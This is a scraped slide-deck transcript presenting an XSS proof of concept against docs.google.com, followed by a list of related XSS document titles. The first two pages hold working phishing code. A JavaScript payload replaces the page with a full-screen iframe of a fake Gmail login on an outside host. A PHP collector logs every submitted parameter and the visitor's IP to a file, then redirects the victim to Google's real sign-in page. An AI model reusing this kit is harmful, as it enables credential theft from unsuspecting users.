Download ppt - XSS POC en docs.google

Transcript

Page 1: XSS POC en docs.google

XSS POC en docs.google.com

::phising.js::document.body.innerHTML = '';var igoogle = document.createElement('iframe');igoogle.src = 'http://www.sinfocol.org/archivos/2009/11/gmail.htm';igoogle.style.width = '100%';igoogle.style.height = '100%';igoogle.style.border = '0';void(document.body.appendChild(igoogle));

Page 2: XSS POC en docs.google

XSS POC en docs.google.com

::gmailpost.php::<?php$filename = 'gmail.txt';

if (count($_GET) == 0) die;

$str = "-------------------\n";$str .= "Date: " . date('d/m/Y - h:i:s a', time()) . "\n";$str .= "IP: " . $_SERVER['REMOTE_ADDR'] . "\n";$str .= "-------------------\n";foreach ($_GET as $indice => $valor) { $str .= "$indice => $valor\n";}

$file = fopen($filename, 'a');fwrite($file, $str);fclose($file);

header('Location: https://www.google.com/accounts/ServiceLogin');

Page 3: XSS POC en docs.google

GANEDINEROGRATIS

FREEMONEY $$

Recommended

Transitional Stage – Palliative Care POC LIGHT VERSIONhealthcareathome.ca/serviceproviders/en/Documents/... · Transitional Stage – Palliative Care POC LIGHT VERSION POC LIGHT

Transitional Stage – Palliative Care POC LIGHT VERSIONhealthcareathome.ca/serviceproviders/en/Documents/... · Transitional Stage – Palliative Care POC LIGHT VERSION POC LIGHT Documents

PRELIMINARY SLIDESconference.hackinthebox.org/hitbsecconf2012kul... · • 2007 - Orkut Worm • 2008 - Yahoo IM XSS • 2009 - Twitter hit by multiple XSS variants, Memova XSS •

PRELIMINARY SLIDESconference.hackinthebox.org/hitbsecconf2012kul... · • 2007 - Orkut Worm • 2008 - Yahoo IM XSS • 2009 - Twitter hit by multiple XSS variants, Memova XSS • Documents

XSS Defense Documents

Xss con javascript

Xss con javascript Internet

Is XSS Solvable?

Is XSS Solvable? Documents

XSS Theory Documents

XSS SQLi sigurnost

XSS SQLi sigurnost Documents

Documentos Entrega Validação documentação POC ambiente POC ...€¦ · ambiente POC Entrega Documentos Validação documentação POC POC Reunião de Esclarecimentos sobre a POC

Documentos Entrega Validação documentação POC ambiente POC ...€¦ · ambiente POC Entrega Documentos Validação documentação POC POC Reunião de Esclarecimentos sobre a POC Documents

XSS - brutelogic.com.brbrutelogic.com.br/docs/XSS-FTW.pdf · Agenda Fast Intro to XSS Dangers of XSS Virtual Defacement LSD - Leakage, Spying and Deceiving Account Stealing Memory

XSS - brutelogic.com.brbrutelogic.com.br/docs/XSS-FTW.pdf · Agenda Fast Intro to XSS Dangers of XSS Virtual Defacement LSD - Leakage, Spying and Deceiving Account Stealing Memory Documents

Combinatorial XSS Attack Grammars - SBA Research · Combinatorial XSS Attack Grammars XSS Vectors for ... SBA Research April 10, 2015 SBA Research, Vienna. Outline Introduction XSS

Combinatorial XSS Attack Grammars - SBA Research · Combinatorial XSS Attack Grammars XSS Vectors for ... SBA Research April 10, 2015 SBA Research, Vienna. Outline Introduction XSS Documents

XSS Injection Vulnerabilities

XSS Injection Vulnerabilities Technology

XSS Google Persistentes

XSS Google Persistentes Technology

XSS Desvendado Documents

XSS Without Browser

XSS Without Browser Education

Srikar Nadipally. Outline Finding and Exploiting XSS Vulnerabilities Standard Reflected XSS Stored XSS DOM based XSS Prevention of XSS attack Reflect

Srikar Nadipally. Outline Finding and Exploiting XSS Vulnerabilities Standard Reflected XSS Stored XSS DOM based XSS Prevention of XSS attack Reflect Documents

Encontrando Vulnerabilidades XSS

Encontrando Vulnerabilidades XSS Documents

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015 Software

Java Security Mythen - Berlin Expert Days · XSS Stored! XSS Reﬂected! XSS Browser executes ... JavaServer Faces automatically escape all output. XSS in action. Don‘t take framework

Java Security Mythen - Berlin Expert Days · XSS Stored! XSS Reﬂected! XSS Browser executes ... JavaServer Faces automatically escape all output. XSS in action. Don‘t take framework Documents